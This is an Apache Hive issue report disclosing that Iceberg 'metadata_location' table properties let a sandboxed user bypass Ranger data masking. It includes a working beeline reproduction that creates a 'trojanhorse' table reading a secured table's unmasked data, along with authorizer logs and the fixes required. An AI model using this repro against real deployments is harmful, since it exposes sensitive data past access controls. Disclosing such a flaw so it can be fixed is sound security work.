Uploaded image for project: 'Hive'
  1. Hive
  2. HIVE-27713

Iceberg: metadata location overrides can cause data breach

    XMLWordPrintableJSON

Details

    Description

      Set to bug/blocker instead of enhancement due to its security related nature, Hive4 should not be released w/o fix for this. Please reset if needed.

       

      Context: 

      • There are some core tables with sensitive data that users can only query with data masking enforced (e.g. via Ranger). Let's assume this is the `default.icebergsecured` table.
      • An end-user can only access the masked form of the sensitive data as expected...
      • The users also have privilege to create new tables in their own sandbox databases - let's assume this is the `default.trojanhorse` table for now.
      • The user can create a malicious table that exposes the sensitive data non-masked leading to a possible data breach.
      • Hive runs with doAs=false to be able to enforce FGAC and prevent end-user direct file-system access needs

      Repro:

      • First make sure the data is secured by the masking policy:
        <kinit as privileged user>
        beeline -e "
        DROP TABLE IF EXISTS default.icebergsecured PURGE;
        CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED BY ICEBERG;
        INSERT INTO default.icebergsecured VALUES ('You might be allowed to see this.','You are NOT allowed to see this!');
        "
        
        <kinit as end user>
        beeline -e "
        SELECT * FROM default.icebergsecured;
        "
        
        +------------------------------------+--------------------------------+
        |         icebergsecured.txt         |     icebergsecured.secret      |
        +------------------------------------+--------------------------------+
        | You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
        +------------------------------------+--------------------------------+
        
      • Now let the user to create the malicious table exposing the sensitive data:
        <kinit as end user>
        SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null |grep metadata_location  |grep -v previous_metadata_location | awk '{print $5}')
        beeline -e "
        DROP TABLE IF EXISTS default.trojanhorse;
        CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED BY ICEBERG
        TBLPROPERTIES (
          'metadata_location'='${SECURED_META_LOCATION}');
        SELECT * FROM default.trojanhorse;
        "
        
        +------------------------------------+-----------------------------------+
        |          trojanhorse.txt           |        trojanhorse.secret         |
        +------------------------------------+-----------------------------------+
        | You might be allowed to see this.  | You are not allowed to see this!  |
        +------------------------------------+-----------------------------------+
        

       

      Currently - after HIVE-26707 - the rwstorage authorization only has either the dummy path or the explicit path set for uri:  

      Permission denied: user [oozie] does not have [RWSTORAGE] privilege on 
      [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
      
      Permission denied: user [oozie] does not have [RWSTORAGE] privilege on 
      [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json] 
      

      With custom location it's even not passed to the authorizer:

      2023-05-17 19:38:51,867 INFO  org.apache.hadoop.hive.ql.Driver: [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: Compiling command(queryId=hive_20230517193851_8b9f0ad7-2ae1-4078-b76a-e51c31321b0b): 
      CREATE EXTERNAL TABLE default.policytestth (txt string, secret string) STORED BY ICEBERG 
      TBLPROPERTIES (
        'metadata_location'='hdfs://test.local.host:8020/warehouse/tablespace/external/hive/policytest/metadata/00001-a3e46c1b-318b-4b46-886a-c6ea591f63c1.metadata.json')
      ...
      2023-05-17 19:38:51,898 DEBUG org.apache.iceberg.mr.hive.HiveIcebergStorageHandler: [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: 
      Iceberg storage handler authorization URI 
      iceberg://default/policytestth?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Fpolicytestth%2Fmetadata%2Fdummy.metadata.json
      

       

      Mandatory changes required for securing tables:

      • Custom location needs to be passed to the Authorizer

      Changes required for usability - e.g. to eliminate the need to require a policy for each tables:

      • Default location needs to be calculated based on warehouse/database def. location
      • CREATE/ALTER with default locations should not involve RWStorage Authorization or should be handled a special way in the Authorizer. 

      Attachments

        Issue Links

          Activity

            People

              ayushtkn Ayush Saxena
              jkovacs@HW Janos Kovacs
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: